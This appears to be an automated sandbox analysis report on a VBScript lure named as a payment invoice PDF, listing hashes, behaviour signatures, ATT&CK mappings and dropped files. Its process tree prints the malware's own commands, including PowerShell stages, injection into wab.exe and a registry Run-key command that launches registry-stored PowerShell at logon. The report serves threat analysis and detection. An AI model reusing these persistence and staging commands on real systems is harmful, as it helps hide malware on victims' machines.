Analysis

  • max time kernel
    122s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64 arch:x86 image:win7-20231129-en locale:en-us os:windows7-x64 system
  • submitted
    04-07-2024 15:23

General

  • Target
    Payment INV-373728_pdf.vbs
  • Size
    22KB
  • MD5
    f15820905822cf3b2f11e3c34c3ea408
  • SHA1
    1d37cfb741fc1b2fa2a47c088dc9f88edf01a501
  • SHA256
    31a6818ba439d39bdae897b77513d3a92d27bc3f93b5b1a5aaf1d77ec5e49738
  • SHA512
    4fcc64060f8b747d849f926501e17512098a6736ba23b2f3de0c4073fa76ab58f0629bf828db56c025dd3ce870c033e2db18bd12028f985c5d5921c567d17358
  • SSDEEP
    384:Ixr9nWbJlZMmn6nDz1mFYAf+dTRyIK53A5NCFm7Ar+rZsezJy7SAls1/CSAZ9TkQ:IxrYbvZMmn6DhmFYAf+dTYIKtwIslPsf

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment INV-373728_pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Windows\syswow64\windowsPowershell\v1.0\Powershell.exe
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tendentis.afs && echo t"
        3⤵
          PID:2544
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:812
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tendentis.afs && echo t"
            4⤵
              PID:1716
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2172
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthrive" /t REG_EXPAND_SZ /d "%Synsfelts% -w 1 $Bucorvinae=(Get-ItemProperty -Path 'HKCU:\Skdyrets\').Breakwater;%Synsfelts% ($Bucorvinae)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1080
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthrive" /t REG_EXPAND_SZ /d "%Synsfelts% -w 1 $Bucorvinae=(Get-ItemProperty -Path 'HKCU:\Skdyrets\').Breakwater;%Synsfelts% ($Bucorvinae)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2132

Network

MITRE ATT&CK Matrix ATT&CK v13

  • Persistence
    Boot or Logon Autostart Execution (1) T1547
    Registry Run Keys / Startup Folder (1) T1547.001
  • Privilege Escalation
    Boot or Logon Autostart Execution (1) T1547
    Registry Run Keys / Startup Folder (1) T1547.001
  • Defense Evasion
    Modify Registry (3) T1112
    Subvert Trust Controls (1) T1553
    Install Root Certificate (1) T1553.004
  • Discovery
    System Information Discovery (1) T1082
  • Command and Control
    Web Service (1) T1102

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize 70KB
    MD5 49aebf8cbd62d92ac215b2923fb1b9f5
    SHA1 1723be06719828dda65ad804298d0431f6aff976
    SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
    SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize 1KB
    MD5 a266bb7dcc38a562631361bbf61dd11b
    SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
    SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
    SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize 342B
    MD5 14d96d9602bfa837757a5571199304f5
    SHA1 51a4713441151b8f81c9d50a54ad69f44168082f
    SHA256 096df312b52b48aaa22d8b4bd5e25e75afce5b26552a7fb2752807dc553aca9a
    SHA512 90a87790e265af1850b8dabf6644089c65c04417b10b41b337078f0d4c83dc88171b76fb317993449fef85b564e00c5cdf62f4f659c35f137ad43338a65074b7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize 342B
    MD5 7f04eda20b78d0823eed3da6e43bcce4
    SHA1 75dab83337440c7beffbc25ff1e482b2b02d0ae0
    SHA256 1838d119f986117b6c97ed05d1672fb9338659b10747e8bff506fe51acdb6391
    SHA512 d9de8aff63d496a49a072905d880c0a524d40f40d9987f631af92f7e45f4dc2d827e001df62d37f880e1e45ec19e2b3f3644efb06d6e7d7f957bbbdbc51fc60a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize 242B
    MD5 adf7bb851b0588b187105b84fa6a95c1
    SHA1 fba88976bc7565474af1cdae139a8ee1937a7edf
    SHA256 8af35b51622aacc548da8bfdd5e2b1e042cbc3cff92bd9a66862fedd2b59fbae
    SHA512 90fda7d6739039b2584d4d9b65f02a5bd68d1599d182576cc278403b0908e8597248ea6b8facbcb58feb91c742a5e2b04b06754ed7673532b0dc49e4a6dad865

  • C:\Users\Admin\AppData\Local\Temp\Tar1BFE.tmp
    Filesize 181KB
    MD5 4ea6026cf93ec6338144661bf1202cd1
    SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
    SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
    SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize 7KB
    MD5 1121c834670ac73f8361594b73b4c921
    SHA1 a8a3e3326ac5bf082b20872d4d967d7e1f8cd632
    SHA256 325a1fa11491138a244d841675fc893a41a4e3148529fc40935896b182c96670
    SHA512 b4d4cd088c5559031920c20c26668e491856e535aec96e4a165f0dcdcd12899e95797bd7894cec1e60fab198c8e7fe5d0adeb7ac9535e0b25c150478fdd86686

  • C:\Users\Admin\AppData\Roaming\Tendentis.afs
    Filesize 481KB
    MD5 40e2726e856af20f6273da18979ccf81
    SHA1 9a6fe482414dea4c5046f199d592f829d94fa12e
    SHA256 7e4be25568094c695602683c645d736d20141d8074f0136f89dad8f97a5294e1
    SHA512 e98cb70a769576dd512ee43c31ef09df7f4f06df3fd94ff7c502f5b30d38d70ce948557a12fa9e61b73f898e3af48ac5d4f8d4d808affe9605c16880ab873fdd

  • memory/812-74-0x0000000006640000-0x000000000BBA0000-memory.dmp
    Filesize 85.4MB
  • memory/2172-77-0x0000000000300000-0x0000000001362000-memory.dmp
    Filesize 16.4MB
  • memory/2928-40-0x0000000074650000-0x0000000074BFB000-memory.dmp
    Filesize 5.7MB
  • memory/2928-42-0x0000000074650000-0x0000000074BFB000-memory.dmp
    Filesize 5.7MB
  • memory/2928-73-0x0000000074650000-0x0000000074BFB000-memory.dmp
    Filesize 5.7MB
  • memory/2928-41-0x0000000074650000-0x0000000074BFB000-memory.dmp
    Filesize 5.7MB
  • memory/2928-39-0x0000000074650000-0x0000000074BFB000-memory.dmp
    Filesize 5.7MB
  • memory/2928-38-0x0000000074651000-0x0000000074652000-memory.dmp
    Filesize 4KB
  • memory/2928-101-0x0000000074650000-0x0000000074BFB000-memory.dmp
    Filesize 5.7MB